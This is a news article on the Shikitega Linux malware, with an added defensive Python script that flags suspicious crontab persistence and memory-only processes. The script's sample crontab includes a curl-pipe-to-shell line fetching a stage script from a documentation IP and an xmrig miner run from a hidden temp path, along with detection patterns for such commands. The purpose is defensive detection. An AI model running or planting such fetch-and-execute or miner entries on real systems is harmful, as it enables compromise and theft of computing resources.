Shikitega is a newly discovered piece of stealthy Linux malware that uses a multi-stage infection chain to infiltrate endpoints and IoT devices and drop further payloads. In new research released on Tuesday, AT&T Alien Labs stated that an attacker "may take complete control of the system, in addition to the cryptocurrency miner that will be executed and set to persist."
Shikitega joins BPFDoor, Symbiote, Syslogk, OrBit, and Lightning Framework among the Linux malware recently discovered in the wild.
Once installed on a target host, the attack chain downloads and runs the Metasploit "Mettle" meterpreter to gain maximum control. It then exploits vulnerabilities to elevate privileges, establishes persistence on the host via crontab, and finally launches a cryptocurrency miner on the infected device.
Although the precise means of initial intrusion remain unknown, Shikitega is evasive because it downloads next-stage payloads from a command-and-control (C2) server and executes them directly in memory.
By exploiting CVE-2021-4034 (also known as PwnKit) and CVE-2021-3493, the attacker can abuse the resulting elevated permissions to fetch and execute the final-stage shell scripts as root, establishing persistence and deploying the Monero crypto miner.
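As an added example (not code from the article or from AT&T Alien Labs), the following Python script shows two checks a defender can run against the behaviours described above: flagging crontab persistence entries that download-and-execute, run from temporary or hidden paths, or carry miner command-line indicators; and flagging running processes whose `/proc/<pid>/exe` link points at a memfd or unlinked binary, the trace left behind by payloads executed directly from memory. All crontab lines and process entries below are constructed samples, and 203.0.113.10 is a documentation address; the heuristic patterns are assumptions chosen for illustration, not indicators published with the research.

```python
import os
import re
from typing import Dict, List

# Constructed crontab text (not from the article): a few ordinary jobs alongside the
# shape of entry a dropper writes for persistence.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /usr/local/bin/backup.sh
* * * * * curl -fsSL http://203.0.113.10/stage3.sh | sh
*/5 * * * * /tmp/.x/xmrig -o pool.example:3333 --donate-level=0
@reboot /var/tmp/.ICE-unix/.run >/dev/null 2>&1
"""

# Heuristics (assumed for this example): (label, pattern) applied to the command part.
SUSPICIOUS = [
    ("download-and-execute pipeline",
     re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|python\d?)\b")),
    ("runs from world-writable or hidden path",
     re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/|/\.[^/\s]+")),
    ("cryptominer command-line indicators",
     re.compile(r"\bxmrig\b|--donate-level|-o\s+\S+:\d{4,5}\b")),
]


def parse_crontab(text: str) -> List[dict]:
    """Split crontab text into {'schedule', 'command'} entries; comments, blank lines
    and environment assignments (NAME=value) are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):                      # @reboot, @daily, ...
            schedule, _, command = line.partition(" ")
        else:
            fields = line.split(None, 5)              # five time fields, then the command
            if len(fields) < 6:
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        entries.append({"schedule": schedule, "command": command.strip()})
    return entries


def flag_crontab(text: str) -> List[dict]:
    """Return the entries matching at least one heuristic, with the matched labels."""
    findings = []
    for entry in parse_crontab(text):
        reasons = [label for label, pat in SUSPICIOUS if pat.search(entry["command"])]
        if reasons:
            findings.append({**entry, "reasons": reasons})
    return findings


# Constructed snapshot of /proc/<pid>/exe link targets. On a live host build it with
# snapshot_proc_exe() below; reading other users' processes needs root.
SAMPLE_PROC_EXE = {
    1: "/usr/lib/systemd/systemd",
    1337: "/memfd:stage2 (deleted)",
    2048: "/usr/bin/python3.10",
    4096: "/tmp/.x/xmrig (deleted)",
}


def flag_fileless_processes(exe_links: Dict[int, str]) -> List[dict]:
    """Flag processes whose executable exists only in memory (memfd_create backing shows
    up as '/memfd:<name> (deleted)') or whose on-disk binary was unlinked after start."""
    findings = []
    for pid, target in exe_links.items():
        if target.startswith("/memfd:"):
            findings.append({"pid": pid, "exe": target, "reason": "memfd-backed executable"})
        elif target.endswith(" (deleted)"):
            findings.append({"pid": pid, "exe": target, "reason": "executable unlinked after start"})
    return findings


def snapshot_proc_exe() -> Dict[int, str]:
    """Live collection helper: readlink /proc/<pid>/exe for every numeric pid directory."""
    links = {}
    for name in os.listdir("/proc"):
        if name.isdigit():
            try:
                links[int(name)] = os.readlink(f"/proc/{name}/exe")
            except OSError:  # kernel threads, vanished pids, or permission denied
                pass
    return links


if __name__ == "__main__":
    for finding in flag_crontab(SAMPLE_CRONTAB):
        print("cron:", finding)
    for finding in flag_fileless_processes(SAMPLE_PROC_EXE):
        print("proc:", finding)
```

On a real host, feed `flag_crontab` the output of `crontab -l` for each user plus the contents of `/etc/crontab` and `/etc/cron.d/*`, and pass `snapshot_proc_exe()` to `flag_fileless_processes`. Both checks are heuristics: a deleted-binary match is also produced by a legitimate package upgrade while the old process is still running, so treat hits as triage leads, not verdicts.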
To further evade detection, the malware's operators use the "Shikata ga nai" polymorphic encoder to make the payload harder for antivirus engines to detect, and rely on legitimate cloud services for C2 activities.
Shikitega is also a sign of a pattern in which bad actors are broadening their attacks to target the Linux operating system, which is widely used on servers and cloud platforms worldwide, a trend that has also brought a rise in LockBit and Cheerscrypt ransomware infections.
The advent of these new Linux ransomware families "directly corresponds to [...] a 75% rise in ransomware attacks targeting Linux systems in the first half of 2022 compared to the first half of 2021," claims Trend Micro's 2022 Midyear Cybersecurity Report.
Ofer Caspi, a researcher at AT&T Alien Labs, stated that threat actors "continue to explore for ways to spread malware in innovative ways to stay under the radar and avoid detection."